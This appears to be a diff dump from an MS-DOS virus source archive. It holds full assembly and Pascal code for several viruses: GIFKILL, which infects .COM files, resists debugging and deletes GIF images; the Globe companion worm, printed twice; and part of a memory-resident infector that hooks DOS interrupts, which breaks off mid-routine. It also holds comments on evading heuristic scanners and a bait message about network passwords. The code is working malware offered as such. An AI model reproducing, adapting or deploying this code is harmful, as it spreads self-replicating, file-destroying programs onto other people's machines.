;-----------------------------------------------------------------------------
CREATE: MOV AH,5Bh ;Create file function.
LEA DX,[BP+OFFSET FNAME] ;Offset file spec.
MOV CX,0 ;Normal attributes.
INT 21h ;Call DOS.
JC EXISTS ;File already excists, do the rest.
XCHG AX,BX ;File handle into BX.
MOV CX,INTRO ;Lenght of intro.
LEA DX,[BP+OFFSET INAME] ;Offset text.
MOV AH,40h ;Write to file function.
INT 21h ;Call DOS.
EXISTS: RET ;Return to caller.
INAME: DB 'You are now looking at the name/passwords of '
DB 'your network! ',CR,LF
DB 'Greetings, ThE wEiRd GeNiUs.',CR,LF
DB 'Check your MSD.INI once in a while!',CR,LF,CR,LF
LBIT: DB 0
;-----------------------------------------------------------------------------
;Comment: From here the code remains UN-encrypted.
;-----------------------------------------------------------------------------
CHKTIME:MOV AH,2Ch ;Get system time.
INT 21h ;Call DOS.
CMP DL,0 ;If zero,
JE CHKTIME ;try again.
RET ;Return to caller.
;-----------------------------------------------------------------------------
CHKDOS: MOV AH,30h ;Get DOS version.
INT 21h ;Call DOS.
RET ;Return to caller.
;-----------------------------------------------------------------------------
VAL_1 DB 00h ;Encryption Value.
;-----------------------------------------------------------------------------
;Encrypting the virus code is not longer the most important thing to do since
;some of the anti-viral software can decrypt and trace the virus code in a
;simulated way. The en/de-cryption routine is almost the only piece of
;code that stays readable and if it is not a polymorphic virus this code
;always stays the same. The only way we can misguide a heuristic
;scanner is to 'tell' it that we are a normal, respectable program. By first
;performing a set of 'normal' instructions we mislead the scanner until it
;stops tracing the program. The result is that the en/decryption routine is
;not discovered. Since there are no other suspicious instructions in the code
;we remain under cover. This is why I used a very simple encryption method.
;-----------------------------------------------------------------------------
ENCRYP: CALL NEXTL ;-Get BP on address.
NEXTL: POP BX ;/
SUB BX,04 ;[BX]=decryption key.
MOV DL,[BX] ;DL=[BX]
SUB BX,LENGTH ;BX=begin of encrypted code.
CMP DL,0 ;Code Encrypted?
JE NOTENC ;Nope
JMP DECRYPT ;Decrypt.
ENCRYPT:LEA BX,[BP+OFFSET CSTART] ;De/en-crypt from here.
DECRYPT:MOV DH,DL ;
MOV CX,CRYPTLEN ;Set counter.
X_LOOP: XOR [BX],DL ;Xor the code on address BX.
SUB DL,DH ;-To change form of scrambled code.
SUB DH,02Eh ;/
INC BX ;Increase address.
LOOP X_LOOP ;Repeat until done.
NOTENC: RET ;Return to caller.
;-----------------------------------------------------------------------------
BUFFER: DB 64 DUP (?) ;Here we store directory info.
;-----------------------------------------------------------------------------
NEW_DTA: ;Here we put the DTA copy.
;-----------------------------------------------------------------------------
CODE ENDS
END START
;=============================================================================

392
MSDOS/Virus.MSDOS.Unknown.gifkill.asm Normal file
View File

@ -0,0 +1,392 @@
; GIFKILL.ASM -- Seek and Destroy GIF
; Written by Dark Avenger
virus_type equ 0 ; Appending Virus
is_encrypted equ 1 ; We're encrypted
tsr_virus equ 0 ; We're not TSR
code segment byte public
assume cs:code,ds:code,es:code,ss:code
org 0100h
main proc near
db 0E9h,00h,00h ; Near jump (for compatibility)
start: call find_offset ; Like a PUSH IP
find_offset: pop bp ; BP holds old IP
sub bp,offset find_offset ; Adjust for length of host
call encrypt_decrypt ; Decrypt the virus
start_of_code label near
lea si,[bp + buffer] ; SI points to original start
mov di,0100h ; Push 0100h on to stack for
push di ; return to main program
movsw ; Copy the first two bytes
movsb ; Copy the third byte
mov di,bp ; DI points to start of virus
mov bp,sp ; BP points to stack
sub sp,128 ; Allocate 128 bytes on stack
mov ah,02Fh ; DOS get DTA function
int 021h
push bx ; Save old DTA address on stack
mov ah,01Ah ; DOS set DTA function
lea dx,[bp - 128] ; DX points to buffer on stack
int 021h
stop_tracing: mov cx,09EBh
mov ax,0FE05h ; Acutal move, plus a HaLT
jmp $-2
add ah,03Bh ; AH now equals 025h
jmp $-10 ; Execute the HaLT
lea bx,[di + null_vector] ; BX points to new routine
push cs ; Transfer CS into ES
pop es ; using a PUSH/POP
int 021h
mov al,1 ; Disable interrupt 1, too
int 021h
jmp short skip_null ; Hop over the loop
null_vector: jmp $ ; An infinite loop
skip_null: mov byte ptr [di + lock_keys + 1],130 ; Prefetch unchanged
lock_keys: mov al,128 ; Change here screws DEBUG
out 021h,al ; If tracing then lock keyboard
mov cx,0003h ; Do 3 infections
search_loop: push cx ; Save CX
call search_files ; Find and infect a file
pop cx ; Restore CX
loop search_loop ; Repeat until CX is 0
call get_weekday
cmp ax,0005h ; Did the function return 5?
je strt00 ; If equal, do effect
jmp end00 ; Otherwise skip over it
strt00: lea dx,[di + data00] ; DX points to data
mov ah,04Eh ; DOS find first file function
mov cx,00100111b ; All file attributes valid
int 021h
jc erase_done ; Exit procedure on failure
mov ah,02Fh ; DOS get DTA function
int 021h
lea dx,[bx + 01Eh] ; DX points to filename in DTA
erase_loop: mov ah,041h ; DOS delete file function
int 021h
mov ah,03Ch ; DOS create file function
xor cx,cx ; No attributes for new file
int 021h
mov ah,041h ; DOS delete file function
int 021h
mov ah,04Fh ; DOS find next file function
int 021h
jnc erase_loop ; Repeat until no files left
erase_done:
end00:
com_end: pop dx ; DX holds original DTA address
mov ah,01Ah ; DOS set DTA function
int 021h
mov sp,bp ; Deallocate local buffer
xor ax,ax ;
mov bx,ax ;
mov cx,ax ;
mov dx,ax ; Empty out the registers
mov si,ax ;
mov di,ax ;
mov bp,ax ;
ret ; Return to original program
main endp
db 0FAh,045h,02Eh,0B3h,024h
search_files proc near
push bp ; Save BP
mov bp,sp ; BP points to local buffer
sub sp,64 ; Allocate 64 bytes on stack
mov ah,047h ; DOS get current dir function
xor dl,dl ; DL holds drive # (current)
lea si,[bp - 64] ; SI points to 64-byte buffer
int 021h
mov ah,03Bh ; DOS change directory function
lea dx,[di + root] ; DX points to root directory
int 021h
call traverse ; Start the traversal
mov ah,03Bh ; DOS change directory function
lea dx,[bp - 64] ; DX points to old directory
int 021h
mov sp,bp ; Restore old stack pointer
pop bp ; Restore BP
ret ; Return to caller
root db "\",0 ; Root directory
search_files endp
traverse proc near
push bp ; Save BP
mov ah,02Fh ; DOS get DTA function
int 021h
push bx ; Save old DTA address
mov bp,sp ; BP points to local buffer
sub sp,128 ; Allocate 128 bytes on stack
mov ah,01Ah ; DOS set DTA function
lea dx,[bp - 128] ; DX points to buffer
int 021h
mov ah,04Eh ; DOS find first function
mov cx,00010000b ; CX holds search attributes
lea dx,[di + all_files] ; DX points to "*.*"
int 021h
jc leave_traverse ; Leave if no files present
check_dir: cmp byte ptr [bp - 107],16 ; Is the file a directory?
jne another_dir ; If not, try again
cmp byte ptr [bp - 98],'.' ; Did we get a "." or ".."?
je another_dir ;If so, keep going
mov ah,03Bh ; DOS change directory function
lea dx,[bp - 98] ; DX points to new directory
int 021h
call traverse ; Recursively call ourself
pushf ; Save the flags
mov ah,03Bh ; DOS change directory function
lea dx,[di + up_dir] ; DX points to parent directory
int 021h
popf ; Restore the flags
jnc done_searching ; If we infected then exit
another_dir: mov ah,04Fh ; DOS find next function
int 021h
jnc check_dir ; If found check the file
leave_traverse:
lea dx,[di + com_mask] ; DX points to "*.COM"
call find_files ; Try to infect a file
done_searching: mov sp,bp ; Restore old stack frame
mov ah,01Ah ; DOS set DTA function
pop dx ; Retrieve old DTA address
int 021h
pop bp ; Restore BP
ret ; Return to caller
up_dir db "..",0 ; Parent directory name
all_files db "*.*",0 ; Directories to search for
com_mask db "*.COM",0 ; Mask for all .COM files
traverse endp
db 0A6h,03Ch,0B6h,078h,0CCh
find_files proc near
push bp ; Save BP
mov ah,02Fh ; DOS get DTA function
int 021h
push bx ; Save old DTA address
mov bp,sp ; BP points to local buffer
sub sp,128 ; Allocate 128 bytes on stack
push dx ; Save file mask
mov ah,01Ah ; DOS set DTA function
lea dx,[bp - 128] ; DX points to buffer
int 021h
mov ah,04Eh ; DOS find first file function
mov cx,00100111b ; CX holds all file attributes
pop dx ; Restore file mask
find_a_file: int 021h
jc done_finding ; Exit if no files found
call infect_file ; Infect the file!
jnc done_finding ; Exit if no error
mov ah,04Fh ; DOS find next file function
jmp short find_a_file ; Try finding another file
done_finding: mov sp,bp ; Restore old stack frame
mov ah,01Ah ; DOS set DTA function
pop dx ; Retrieve old DTA address
int 021h
pop bp ; Restore BP
ret ; Return to caller
find_files endp
db 002h,0EFh,034h,048h,091h
infect_file proc near
mov ah,02Fh ; DOS get DTA address function
int 021h
mov si,bx ; SI points to the DTA
mov byte ptr [di + set_carry],0 ; Assume we'll fail
cmp word ptr [si + 01Ah],(65279 - (finish - start))
jbe size_ok ; If it's small enough continue
jmp infection_done ; Otherwise exit
size_ok: mov ax,03D00h ; DOS open file function, r/o
lea dx,[si + 01Eh] ; DX points to file name
int 021h
xchg bx,ax ; BX holds file handle
mov ah,03Fh ; DOS read from file function
mov cx,3 ; CX holds bytes to read (3)
lea dx,[di + buffer] ; DX points to buffer
int 021h
mov ax,04202h ; DOS file seek function, EOF
cwd ; Zero DX _ Zero bytes from end
mov cx,dx ; Zero CX /
int 021h
xchg dx,ax ; Faster than a PUSH AX
mov ah,03Eh ; DOS close file function
int 021h
xchg dx,ax ; Faster than a POP AX
sub ax,finish - start + 3 ; Adjust AX for a valid jump
cmp word ptr [di + buffer + 1],ax ; Is there a JMP yet?
je infection_done ; If equal then exit
mov byte ptr [di + set_carry],1 ; Success -- the file is OK
add ax,finish - start ; Re-adjust to make the jump
mov word ptr [di + new_jump + 1],ax ; Construct jump
mov ax,04301h ; DOS set file attrib. function
xor cx,cx ; Clear all attributes
lea dx,[si + 01Eh] ; DX points to victim's name
int 021h
mov ax,03D02h ; DOS open file function, r/w
int 021h
xchg bx,ax ; BX holds file handle
mov ah,040h ; DOS write to file function
mov cx,3 ; CX holds bytes to write (3)
lea dx,[di + new_jump] ; DX points to the jump we made
int 021h
mov ax,04202h ; DOS file seek function, EOF
cwd ; Zero DX _ Zero bytes from end
mov cx,dx ; Zero CX /
int 021h
push si ; Save SI through call
call encrypt_code ; Write an encrypted copy
pop si ; Restore SI
mov ax,05701h ; DOS set file time function
mov cx,[si + 016h] ; CX holds old file time
mov dx,[si + 018h] ; DX holds old file date
int 021h
mov ah,03Eh ; DOS close file function
int 021h
mov ax,04301h ; DOS set file attrib. function
xor ch,ch ; Clear CH for file attribute
mov cl,[si + 015h] ; CX holds file's old attributes
lea dx,[si + 01Eh] ; DX points to victim's name
int 021h
infection_done: cmp byte ptr [di + set_carry],1 ; Set carry flag if failed
ret ; Return to caller
set_carry db ? ; Set-carry-on-exit flag
buffer db 090h,0CDh,020h ; Buffer to hold old three bytes
new_jump db 0E9h,?,? ; New jump to virus
infect_file endp
db 089h,043h,03Bh,054h,0AAh
get_weekday proc near
mov ah,02Ah ; DOS get date function
int 021h
cbw ; Sign-extend AL into AX
ret ; Return to caller
get_weekday endp
data00 db "*.GIF",0
vcl_marker db "[Z10]",0 ; VCL creation marker
note db "Bye Bye Mr.GIF",0
db "You'll never find all the file"
db "s I have infected!",0
encrypt_code proc near
push bp ; Save BP
mov bp,di ; Use BP as pointer to code
lea si,[bp + encrypt_decrypt]; SI points to cipher routine
xor ah,ah ; BIOS get time function
int 01Ah
mov word ptr [si + 9],dx ; Low word of timer is new key
xor byte ptr [si + 1],8 ;
xor byte ptr [si + 8],1 ; Change all SIs to DIs
xor word ptr [si + 11],0101h; (and vice-versa)
lea di,[bp + finish] ; Copy routine into heap
mov cx,finish - encrypt_decrypt - 1 ; All but final RET
push si ; Save SI for later
push cx ; Save CX for later
rep movsb ; Copy the bytes
lea si,[bp + write_stuff] ; SI points to write stuff
mov cx,5 ; CX holds length of write
rep movsb ; Copy the bytes
pop cx ; Restore CX
pop si ; Restore SI
inc cx ; Copy the RET also this time
rep movsb ; Copy the routine again
mov ah,040h ; DOS write to file function
lea dx,[bp + start] ; DX points to virus
lea si,[bp + finish] ; SI points to routine
call si ; Encrypt/write/decrypt
mov di,bp ; DI points to virus again
pop bp ; Restore BP
ret ; Return to caller
write_stuff: mov cx,finish - start ; Length of code
int 021h
encrypt_code endp
end_of_code label near
encrypt_decrypt proc near
lea si,[bp + start_of_code] ; SI points to code to decrypt
mov cx,(end_of_code - start_of_code) / 2 ; CX holds length
xor_loop: db 081h,034h,00h,00h ; XOR a word by the key
inc si ; Do the next word
inc si ;
loop xor_loop ; Loop until we're through
ret ; Return to caller
encrypt_decrypt endp
finish label near
code ends
end main

1450
MSDOS/Virus.MSDOS.Unknown.girigat.asm Normal file
View File

File diff suppressed because it is too large Load Diff

106
MSDOS/Virus.MSDOS.Unknown.globe.asm Normal file
View File

@ -0,0 +1,106 @@
Program Worm;
{$M 2048,0,4096}
Uses Dos, Crt;
Var F1 : File;
F2 : File;
O : String;
Parm : String;
P : DirStr;
N : NameStr;
E : ExtStr;
Buf : Array[0..8000] of Byte;
NumRead : Word;
NumWritten : Word;
DirInfo : SearchRec;
ComExist : SearchRec;
Infect : Byte;
Procedure StartOrigExe;
Begin
O := ParamStr(0);
FSplit(O,P,N,E);
O := P+N+'.EXE';
P := '';
For NumRead := 1 To ParamCount Do
P := P + ParamStr(NumRead);
SwapVectors;
Exec(O,P);
SwapVectors;
End;
Procedure InfectExe;
Begin
FindFirst('*.EXE',Archive,DirInfo);
While (DosError = 0) And (Infect <> 0) Do
Begin
FSplit(DirInfo.Name,P,N,E);
O := P+N+'.COM';
FindFirst(O,Hidden,ComExist);
If DosError <> 0 Then
Begin
Assign(F1,O);
Rewrite(F1,1);
BlockWrite(F1,buf,NumRead,NumWritten);
Close(F1);
SetFattr(F1,Hidden);
Dec(Infect);
End;
FindNext(DirInfo);
End;
End;
Procedure Activate;
Var
T1,T2 : Integer;
I : Real;
X , Y : Byte;
Resolution : Integer;
Begin
ClrScr;
I := 0;
T2 := 38;
Randomize;
Repeat
Resolution := 50;
For T1 := 0 to Resolution Do
Begin
X := Abs(40+Round(Sin(I)*T2));
Y := Abs(12-Round(Cos(I)*10));
GotoXY(X,Y);
Write('Û');
I := I + ((Pi*2)/Resolution);
End;
T2 := T2 - 1;
TextColor(Random(14)+1);
Until T2 < 2;
GotoXY(30,12);
TextColor(White);
Write('* The Globe Virus *');
Asm
Mov Ah,8
Int 21h
End;
ClrScr;
End;
Begin
Infect := 3;
Randomize;
Assign(F2,ParamStr(0));
Reset(F2,1);
BlockRead(F2,buf,SizeOf(buf),NumRead);
Close(F2);
InfectExe;
StartOrigExe;
If Random(16) = 0 then Activate;
Halt(DosExitCode);
End.
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> and Remember Don't Forget to Call <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄ> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <ÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

106
MSDOS/Virus.MSDOS.Unknown.globe.pas Normal file
View File

@ -0,0 +1,106 @@
Program Worm;
{$M 2048,0,4096}
Uses Dos, Crt;
Var F1 : File;
F2 : File;
O : String;
Parm : String;
P : DirStr;
N : NameStr;
E : ExtStr;
Buf : Array[0..8000] of Byte;
NumRead : Word;
NumWritten : Word;
DirInfo : SearchRec;
ComExist : SearchRec;
Infect : Byte;
Procedure StartOrigExe;
Begin
O := ParamStr(0);
FSplit(O,P,N,E);
O := P+N+'.EXE';
P := '';
For NumRead := 1 To ParamCount Do
P := P + ParamStr(NumRead);
SwapVectors;
Exec(O,P);
SwapVectors;
End;
Procedure InfectExe;
Begin
FindFirst('*.EXE',Archive,DirInfo);
While (DosError = 0) And (Infect <> 0) Do
Begin
FSplit(DirInfo.Name,P,N,E);
O := P+N+'.COM';
FindFirst(O,Hidden,ComExist);
If DosError <> 0 Then
Begin
Assign(F1,O);
Rewrite(F1,1);
BlockWrite(F1,buf,NumRead,NumWritten);
Close(F1);
SetFattr(F1,Hidden);
Dec(Infect);
End;
FindNext(DirInfo);
End;
End;
Procedure Activate;
Var
T1,T2 : Integer;
I : Real;
X , Y : Byte;
Resolution : Integer;
Begin
ClrScr;
I := 0;
T2 := 38;
Randomize;
Repeat
Resolution := 50;
For T1 := 0 to Resolution Do
Begin
X := Abs(40+Round(Sin(I)*T2));
Y := Abs(12-Round(Cos(I)*10));
GotoXY(X,Y);
Write('Û');
I := I + ((Pi*2)/Resolution);
End;
T2 := T2 - 1;
TextColor(Random(14)+1);
Until T2 < 2;
GotoXY(30,12);
TextColor(White);
Write('* The Globe Virus *');
Asm
Mov Ah,8
Int 21h
End;
ClrScr;
End;
Begin
Infect := 3;
Randomize;
Assign(F2,ParamStr(0));
Reset(F2,1);
BlockRead(F2,buf,SizeOf(buf),NumRead);
Close(F2);
InfectExe;
StartOrigExe;
If Random(16) = 0 then Activate;
Halt(DosExitCode);
End.
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> and Remember Don't Forget to Call <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄ> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <ÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

895
MSDOS/Virus.MSDOS.Unknown.gmb.asm Normal file
View File

@ -0,0 +1,895 @@
CODE segment para public 'code'
assume cs:code,ds:code,es:nothing,ss:nothing
org 100h
egy equ 1 ; one
dma equ 0b0h
atvar equ 300 ; at paramaeter
xtvar equ 1 ; xt parameter
suruseg equ 255 ; density
idotartalek equ 18*30 ; time delay
start: db 0e9h,0,0
;##################### Initialization ######################
resid: push ax
mov cx,offset memory - offset begin ;#### decoding ####
mov bx,ds:[101h]
add bx,103h+(offset begin-offset resid)
jhg1: xor byte ptr [bx],0
inc bx
loop jhg1
begin: sub bx,(offset begin-offset resid)+(offset memory - offset begin)
mov cs:[0feh],bx
mov ax,[bx+(offset eltarol-offset resid)]
mov cl,[bx+(offset eltarol-offset resid)+2]
mov ds:[100h],ax
mov ds:[102h],cl
mov cx,0b800h
mov ah,15
push bx
int 10h
pop bx
cmp al,7
jne rety
mov ch,0b0h
rety: mov [bx+(offset ruut - offset resid)+1],cx
mov word ptr [bx+(offset counter-offset resid)],idotartalek
mov byte ptr [bx+(offset jammed-offset resid)+1],al
mov byte ptr [bx+(offset vanesik-offset resid)],0
xor ax,ax
mov ds,ax
cmp word ptr ds:[130h],4142h
je zipp
mov ds:[130h],4142h
mov ax,cs
dec ax
mov ds,ax
mov ax,ds:[3]
sub ax,180h
mov ds:[3],ax
add ax,ds:[1]
mov es,ax
push cs
pop ds
sub word ptr ds:[2],384
mov di,3
mov si,bx
mov cx,(offset memory-offset resid) shr 1 +1
cld
rep movsw
mov ax,es
sub ax,10h
mov ds,ax
mov dx,offset irq
mov ax,251ch
int 21h
mov ah,2ah
int 21h
cmp al,1
jne zipp
dec al
out 0a0h,al
mov al,dma
out 41h,al
zipp:
mov ax,cs
mov ds,ax
mov es,ax
pop ax
push cs
mov cx,100h
push cx
mov cx,ds:[0feh]
sub cx,100h
retf
eltarol dw 20cdh
eltarol2 db 90h
;######################### Vyrus activated ##########################
csik: mov ax,0e000h
mov ds,ax
csiky: mov ds:[0],al
inc al
jmp csiky
;######################### propagation part ##########################
eredeti: db 0eah ; original
int211 dw 0
int212 dw 0
counter dw 0
szaporodas: cmp ah,4bh
jne eredeti
or al,al
jnz eredeti
push ax
push es
push bx
push ds
push dx
mov bx,dx
koj: inc bx
cmp byte ptr [bx],'.'
jne koj
cmp byte ptr[bx+1],'C'
jne kiugras1
mov cs:kds,ds
mov cs:kdx,dx
mov cs:kbx,bx
call probe
kiugras1: pop dx
pop ds
pop bx
pop es
pop ax
jmp eredeti
kds dw 0
kdx dw 0
kbx dw 0
kkk dw 0
fszam dw 0
probe: push cs
pop es
mov di,offset memory
mov si,dx
mov cx,40
cld
rep movsw
mov bx,0ff0h
mov ah,48h
int 21h
jnc juk1
ret
;!!!!! memoria lefoglalva (kkk = Seg)
atr dw 0
juk1: mov cs:kkk,ax
mov dx,offset memory
push ds
pop es
mov bx,cs:kbx
mov byte ptr [bx+1],'A'
call elorutin
push cs
pop ds ;DS:DX a masolt nev.
mov ax,4300h
int 21h
mov atr,cx
xor cx,cx
mov ax,4301h
int 21h
;!!!!! Attr allitas
cmp cs:attrflag,0
jz juk2
mov ds,cs:kds
jmp memoff
juk2: mov di,kdx ;ES:DI a regi nev atirva
mov ah,56h
int 21h
call utorutin ;!!!!! Atnevezve
mov dx,cs:kdx
push es
pop ds
mov ax,3d02h
int 21h ;!!!!! File megnyitva
mov cs:fszam,ax
mov ds,cs:kkk
xor dx,dx
mov bx,ax
mov cx,0fc00h-(offset memory-offset resid)
mov ah,3fh
int 21h
cmp ax,0fc00h-(offset memory-offset resid)
;!!!!! Beolvasva a program (csak a hossza miatt)
je hosszu ;zarjuk le a file-t
cmp ax,7580
jb hosszu ;tul rovid a file
mov di,ax
mov bx,ds:[1]
cmp word ptr [bx+3],0b950h
;$$$$$$$$$$$$$$$$$$$$$$$$$ FUCK OFF TASM,MASM $$$$$$$$$$$$$$$$$$$$$$$$$$$
je hosszu
push di
mov cx,(offset memory-offset resid)
mov si,offset resid
push ds
pop es
push cs
pop ds
inc byte ptr ds:[offset jhg1 +2]
mov ax,es:[0]
mov eltarol,ax
mov al,es:[2]
mov eltarol2,al
rep movsw ;!!!!! Atmasolva (hehe)
mov al,byte ptr ds:[offset jhg1 +2]
pop di
add di,(offset begin-offset resid)
mov cx,offset memory - offset begin ;#### coding ####
jhga: xor byte ptr es:[di],al
inc di
loop jhga
sub di,(offset memory - offset resid)
push di ;Az ugrasi hely
mov bx,fszam
mov cx,offset memory - offset begin
mov dx,di
push es
pop ds
mov ah,40h
int 21h
pop di
cmp ax,offset memory - offset begin
je ghj1
hosszu: jmp zardle
ghj1: ;!!!!! Kiirva a vege
mov byte ptr ds:[0],0e9h
sub di,3
mov ds:[1],di
mov bx,cs:fszam
xor cx,cx
xor dx,dx
mov ax,4200h
push bx
int 21h
pop bx
mov cx,3
xor dx,dx
mov ah,40h
int 21h
zardle: mov bx,cs:fszam
mov ah,3eh
int 21h ;!!!!! File lezarva
push cs
pop es
mov di,offset memory
mov ds,cs:kds
mov dx,cs:kdx
mov ah,56h
int 21h ;!!!!! File visszanevezve
mov bx,cs:kbx
mov byte ptr ds:[bx+1],'C'
mov ax,4301h
mov cx,cs:atr
int 21h ;!!!!! attr visszaall
memoff: mov bx,cs:kbx
mov byte ptr ds:[bx+1],'C'
push cs
pop ds
mov es,cs:kkk
mov ah,49h
int 21h ;!!!!! Memoria visszaalt
ret
it241 dw 0
it242 dw 0
attrflag db 0
elorutin: mov cs:attrflag,0
xor ax,ax
mov ds,ax
mov ax,ds:[90h]
mov cs:it241,ax
mov ax,ds:[92h]
mov cs:it242,ax
mov ds:[90h],offset it24
mov ds:[92h],cs
ret
utorutin: xor ax,ax
mov ds,ax
mov ax,cs:it241
mov ds:[90h],ax
mov ax,cs:it242
mov ds:[92h],ax
ret
it24: mov cs:attrflag,1
xor al,al
iret
vanesik db 0
irq: cli
push ds
push es
push ax
push bx
push cx
push dx
push si
push di
cmp cs:counter,0
je sabad
dec cs:counter
jne sabad
xor ax,ax
mov ds,ax
mov ax,ds:[84h]
mov cs:int211,ax
mov ax,ds:[86h]
mov cs:int212,ax
mov ds:[84h],offset szaporodas
mov ds:[86h],cs
sabad: cmp cs:vanesik,0
je keress
call idovan
jmp jumper
keress: call ruut
jumper: pop di
pop si
pop dx
pop cx
pop bx
pop ax
pop es
pop ds
iret
idovan: xor ah,ah
int 1ah
and dx,suruseg
jne rutyi
call action
rutyi: ret
ruut: mov ax,0b800h
mov es,ax
mov di,cs:did
mov cx,512
cld
poke: jcxz huy
mov al,'E'
repnz scasb
jz talalt
huy: cmp di,4095
jb kisebb
mov cs:did,0
ret
kisebb: add cs:did,512
ret
did dw 0
talalt: test di,1
jz poke
mov dl,es:[di+1]
mov dh,es:[di+3]
or dx,2020h
cmp dx,6973h ;'is'
jne poke
mov bl,es:[di+5]
or bl,20h
cmp bl,'k'
jne poke
mov cs:vanesik,1
jmp huy
action: mov ax,cs
mov ds,ax
mov es,ax
mov vanesik,0
mov pontszam,1
mov si,offset zizi
mov di,offset novi
cld
mov cx,6
rep movsw
call zoldseg
jammed: mov ax,3
int 10h
cmp counterr,atvar
jne fdr
push cs
pop es
lea bx,mess
mov ax,1301h
mov bx,1
xor dx,dx
mov cx,offset drt-offset mess
int 10h
fdr: ret
counterr dw 0
zoldseg: cli
mov di,offset memory
xor ax,ax
cld
mov cx,200*3
rep stosw
mov ah,0c0h
mov si,3333h
int 15h
cmp si,3333h
mov ax,xtvar
je xt
mov ax,atvar
xt: mov counterr,ax
mov ax,3502h
int 21h
cmp bx,0e9eh
jne ibm
call init1
mov pontm,100
mov port,22h
jmp entry
ibm: ;Ibm bulik
mov pontm,200
mov al,70h
mov port,60h ;%
mov ah,15
int 10h
cmp al,7
jne cga
call init3
jmp entry
cga: call init2
jmp entry
port dw 22h
pontm dw 100
init1: mov ax,200h
mov es,ax
xor di,di
mov cx,4000h
cld
xor ax,ax
rep stosw
mov plotdw,offset plot
mov unplotdw,offset unplot
ret
init2: mov ax,0b800h
mov es,ax
mov ax,6
int 10h
mov plotdw,offset plotcga
mov unplotdw,offset unplotcga
ret
init3: mov ax,0b000h
mov es,ax
call prog
mov plotdw,offset plotherc
mov unplotdw,offset unplotcga
ret
prog: mov dx,3bfh
mov al,3
out dx,al
mov al,28h
mov dx,3b8h
out dx,al
mov ah,0
mov cx,12
lea bx,ports
lopi1: mov dx,03b4h
mov al,ah
out dx,al
inc ah
mov dx,03b5h
mov al,[bx]
out dx,al
inc bx
loop lopi1
mov dx,3bfh
mov al,3
out dx,al
mov dx,3b8h
mov al,0ah
out dx,al
xor di,di
mov cx,4000h
xor ax,ax
cld
rep stosw
ret
ports db 35h,2dh,2eh,7,5bh,2,57h,57h,2,3,0,0
;**************************** Forgatorutin ************************************
even
sina dw 0
cosa dw 0 ;si-t meghagyja
sinb dw 0
cosb dw 0
pontszam dw 1
transzform: ;be: di=X, bx=Y, cx=Z, SINA,COSA,SINB,COSB
; add bx,ytol ;ez itt jolesz
shl di,1
shl bx,1 ;X es Y elokeszitese a szorzashoz
mov ax,di
imul cosa
mov bp,dx
mov ax,bx
imul sina
add bp,dx ; bp=X' = cosa*X + sina*Y
mov ax,bx
imul cosa
mov bx,dx
mov ax,di
imul sina
sub bx,dx ; bx=Y' = cosa*X - sina*Y
shl bp,1
shl cx,1 ;X' es Z elokeszitese
mov ax,bp
imul cosb
mov di,dx
mov ax,cx
imul sinb
sub di,dx ; di=X'' = cosb*X' - sinb*Z
mov cx,di
mov ax,bx
ret
comment @
mov ax,cx
imul cosb
mov cx,dx
mov ax,bp
imul sinb
add cx,dx ; cx=Z'' = cosb*Z = sinb*X'
; out: di=X'' bx=Y'' cx=Z''
mov dx,keptav
;****************************** PERSPEKTIVA **********************************
mov ax,di
shl ax,1
imul tavol
mov cx,dx
mov ax,bx
shl ax,1
imul tavol
mov ax,dx
ret ; ki : CX=X' AX=Y'
@
plotherc: ; al=y cx=x
xor ah,ah
mov dx,ax
shr dx,1
add ax,dx
mov dx,cx
mov cl,al
and cl,3
shr ax,1
shr al,1
mov di,2000h
shl di,cl
mov cl,90
mul cl
add di,ax
mov ax,dx
mov cx,dx
jmp ezisi
plotcga: xor di,di
shr ax,1
jnc tryp
mov di,2000h
tryp: mov dl,80
mul dl
add di,ax
mov ax,cx
ezisi: shr ax,1
shr ax,1
shr ax,1
add di,ax
and cl,7
mov al,128
shr al,cl
or es:[di],al
jmp ezis1
unplotcga: mov al,[bx]
mov di,[bx+1]
xor al,255
and es:[di],al
ret
plot: ;AL = y koord. cx = x koord.
mov dl,160
mul dl
mov di,ax
mov ax,cx
shr ax,1
shr ax,1
add di,ax
and di,-2
and cl,7
mov al,128
shr al,cl
or es:[di+egy],al
ezis1: mov [bx],al
inc bx
mov [bx],di
add bx,2
ret
unplot: mov al,[bx]
mov di,[bx+1]
xor al,255
and es:[di+egy],al
ret
kezdfazisrajz: mov bx,offset memory
mov si,offset gombdata
mov cx,pontszam
ck1: push cx
lodsw
mov cx,ax
shl cx,1
add cx,320
lodsw
add si,2
add ax,50
call word ptr [plotdw]
pop cx
loop ck1
ret
indy db 0
fazisrajz: mov bx,offset memory
mov si,offset gombdata
mov cx,pontszam
mov indy,1
ck12: push cx
call word ptr [unplotdw]
push bx
lodsw
mov di,ax
lodsw
mov bx,ax
lodsw
mov cx,ax
call transzform
pop bx
add ax,50
mov di,bxpo
add al,[di]
